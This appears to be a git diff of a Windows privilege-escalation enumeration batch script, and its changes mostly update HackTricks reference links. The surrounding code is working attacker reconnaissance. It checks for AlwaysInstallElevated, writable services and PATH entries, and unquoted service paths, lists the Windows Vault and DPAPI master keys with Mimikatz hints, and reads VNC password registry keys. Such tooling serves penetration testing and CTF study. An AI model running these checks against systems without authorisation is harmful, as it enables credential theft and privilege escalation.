reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall /s | findstr InstallLocation | findstr ":\\"
|
||||
@ -236,7 +236,7 @@ CALL :T_Progress 2
|
||||
|
||||
:RemodeDeskCredMgr
|
||||
CALL :ColorLine " %E%33m[+]%E%97m Remote Desktop Credentials Manager"
|
||||
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#remote-desktop-credential-manager
|
||||
ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#remote-desktop-credential-manager
|
||||
IF exist "%LOCALAPPDATA%\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings" ECHO.Found: RDCMan.settings in %AppLocal%\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings, check for credentials in .rdg files
|
||||
ECHO.
|
||||
CALL :T_Progress 1
|
||||
@ -244,7 +244,7 @@ CALL :T_Progress 1
|
||||
:WSUS
|
||||
CALL :ColorLine " %E%33m[+]%E%97m WSUS"
|
||||
ECHO. [i] You can inject 'fake' updates into non-SSL WSUS traffic (WSUXploit)
|
||||
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#wsus
|
||||
ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#wsus
|
||||
reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate\ 2>nul | findstr /i "wuserver" | findstr /i "http://"
|
||||
ECHO.
|
||||
CALL :T_Progress 1
|
||||
@ -252,7 +252,7 @@ CALL :T_Progress 1
|
||||
:RunningProcesses
|
||||
CALL :ColorLine " %E%33m[+]%E%97m RUNNING PROCESSES"
|
||||
ECHO. [i] Something unexpected is running? Check for vulnerabilities
|
||||
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#running-processes
|
||||
ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#running-processes
|
||||
tasklist /SVC
|
||||
ECHO.
|
||||
CALL :T_Progress 2
|
||||
@ -273,7 +273,7 @@ CALL :T_Progress 3
|
||||
:RunAtStartup
|
||||
CALL :ColorLine " %E%33m[+]%E%97m RUN AT STARTUP"
|
||||
ECHO. [i] Check if you can modify any binary that is going to be executed by admin or if you can impersonate a not found binary
|
||||
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#run-at-startup
|
||||
ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#run-at-startup
|
||||
::(autorunsc.exe -m -nobanner -a * -ct /accepteula 2>nul || wmic startup get caption,command 2>nul | more & ^
|
||||
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run 2>nul & ^
|
||||
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce 2>nul & ^
|
||||
@ -297,7 +297,7 @@ CALL :T_Progress 2
|
||||
:AlwaysInstallElevated
|
||||
CALL :ColorLine " %E%33m[+]%E%97m AlwaysInstallElevated?"
|
||||
ECHO. [i] If '1' then you can install a .msi file with admin privileges ;)
|
||||
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#alwaysinstallelevated
|
||||
ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#alwaysinstallelevated
|
||||
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated 2> nul
|
||||
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated 2> nul
|
||||
ECHO.
|
||||
@ -361,7 +361,7 @@ CALL :T_Progress 1
|
||||
:BasicUserInfo
|
||||
CALL :ColorLine "%E%32m[*]%E%97m BASIC USER INFO
|
||||
ECHO. [i] Check if you are inside the Administrators group or if you have enabled any token that can be use to escalate privileges like SeImpersonatePrivilege, SeAssignPrimaryPrivilege, SeTcbPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeCreateTokenPrivilege, SeLoadDriverPrivilege, SeTakeOwnershipPrivilege, SeDebbugPrivilege
|
||||
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#users-and-groups
|
||||
ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#users-and-groups
|
||||
ECHO.
|
||||
CALL :ColorLine " %E%33m[+]%E%97m CURRENT USER"
|
||||
net user %username%
|
||||
@ -435,7 +435,7 @@ ECHO.
|
||||
|
||||
:ServiceBinaryPermissions
|
||||
CALL :ColorLine " %E%33m[+]%E%97m SERVICE BINARY PERMISSIONS WITH WMIC and ICACLS"
|
||||
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services
|
||||
ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#services
|
||||
for /f "tokens=2 delims='='" %%a in ('cmd.exe /c wmic service list full ^| findstr /i "pathname" ^|findstr /i /v "system32"') do (
|
||||
for /f eol^=^"^ delims^=^" %%b in ("%%a") do icacls "%%b" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users todos usuarios %username%" && ECHO.
|
||||
)
|
||||
@ -444,7 +444,7 @@ CALL :T_Progress 1
|
||||
|
||||
:CheckRegistryModificationAbilities
|
||||
CALL :ColorLine " %E%33m[+]%E%97m CHECK IF YOU CAN MODIFY ANY SERVICE REGISTRY"
|
||||
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services
|
||||
ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#services
|
||||
for /f %%a in ('reg query hklm\system\currentcontrolset\services') do del %temp%\reg.hiv >nul 2>&1 & reg save %%a %temp%\reg.hiv >nul 2>&1 && reg restore %%a %temp%\reg.hiv >nul 2>&1 && ECHO.You can modify %%a
|
||||
ECHO.
|
||||
CALL :T_Progress 1
|
||||
@ -453,7 +453,7 @@ CALL :T_Progress 1
|
||||
CALL :ColorLine " %E%33m[+]%E%97m UNQUOTED SERVICE PATHS"
|
||||
ECHO. [i] When the path is not quoted (ex: C:\Program files\soft\new folder\exec.exe) Windows will try to execute first 'C:\Program.exe', then 'C:\Program Files\soft\new.exe' and finally 'C:\Program Files\soft\new folder\exec.exe'. Try to create 'C:\Program Files\soft\new.exe'
|
||||
ECHO. [i] The permissions are also checked and filtered using icacls
|
||||
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services
|
||||
ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#services
|
||||
for /f "tokens=2" %%n in ('sc query state^= all^| findstr SERVICE_NAME') do (
|
||||
for /f "delims=: tokens=1*" %%r in ('sc qc "%%~n" ^| findstr BINARY_PATH_NAME ^| findstr /i /v /l /c:"c:\windows\system32" ^| findstr /v /c:""""') do (
|
||||
ECHO.%%~s ^| findstr /r /c:"[a-Z][ ][a-Z]" >nul 2>&1 && (ECHO.%%n && ECHO.%%~s && icacls %%s | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%") && ECHO.
|
||||
@ -468,7 +468,7 @@ ECHO.
|
||||
CALL :ColorLine "%E%32m[*]%E%97m DLL HIJACKING in PATHenv variable"
|
||||
ECHO. [i] Maybe you can take advantage of modifying/creating some binary in some of the following locations
|
||||
ECHO. [i] PATH variable entries permissions - place binary or DLL to execute instead of legitimate
|
||||
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#dll-hijacking
|
||||
ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#dll-hijacking
|
||||
for %%A in ("%path:;=";"%") do ( cmd.exe /c icacls "%%~A" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO. )
|
||||
ECHO.
|
||||
CALL :T_Progress 1
|
||||
@ -477,7 +477,7 @@ CALL :T_Progress 1
|
||||
CALL :ColorLine "%E%32m[*]%E%97m CREDENTIALS"
|
||||
ECHO.
|
||||
CALL :ColorLine " %E%33m[+]%E%97m WINDOWS VAULT"
|
||||
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#windows-vault
|
||||
ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#windows-vault
|
||||
cmdkey /list
|
||||
ECHO.
|
||||
CALL :T_Progress 2
|
||||
@ -485,14 +485,14 @@ CALL :T_Progress 2
|
||||
:DPAPIMasterKeys
|
||||
CALL :ColorLine " %E%33m[+]%E%97m DPAPI MASTER KEYS"
|
||||
ECHO. [i] Use the Mimikatz 'dpapi::masterkey' module with appropriate arguments (/rpc) to decrypt
|
||||
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#dpapi
|
||||
ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#dpapi
|
||||
powershell -command "Get-ChildItem %appdata%\Microsoft\Protect" 2>nul
|
||||
powershell -command "Get-ChildItem %localappdata%\Microsoft\Protect" 2>nul
|
||||
CALL :T_Progress 2
|
||||
CALL :ColorLine " %E%33m[+]%E%97m DPAPI MASTER KEYS"
|
||||
ECHO. [i] Use the Mimikatz 'dpapi::cred' module with appropriate /masterkey to decrypt
|
||||
ECHO. [i] You can also extract many DPAPI masterkeys from memory with the Mimikatz 'sekurlsa::dpapi' module
|
||||
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#dpapi
|
||||
ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#dpapi
|
||||
ECHO.
|
||||
ECHO.Looking inside %appdata%\Microsoft\Credentials\
|
||||
ECHO.
|
||||
@ -565,7 +565,7 @@ CALL :T_Progress 2
|
||||
|
||||
:AppCMD
|
||||
CALL :ColorLine " %E%33m[+]%E%97m AppCmd"
|
||||
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#appcmd-exe
|
||||
ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#appcmd-exe
|
||||
IF EXIST %systemroot%\system32\inetsrv\appcmd.exe ECHO.%systemroot%\system32\inetsrv\appcmd.exe exists.
|
||||
ECHO.
|
||||
CALL :T_Progress 2
|
||||
@ -573,7 +573,7 @@ CALL :T_Progress 2
|
||||
:RegFilesCredentials
|
||||
CALL :ColorLine " %E%33m[+]%E%97m Files in registry that may contain credentials"
|
||||
ECHO. [i] Searching specific files that may contains credentials.
|
||||
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#credentials-inside-files
|
||||
ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#credentials-inside-files
|
||||
ECHO.Looking inside HKCU\Software\ORL\WinVNC3\Password
|
||||
reg query HKCU\Software\ORL\WinVNC3\Password 2>nul
|
||||
CALL :T_Progress 2
|
||||
|
BIN
win/winPEAS.exe
BIN
win/winPEAS.exe
Binary file not shown.
Binary file not shown.
Loading…
Reference in New Issue
Block a user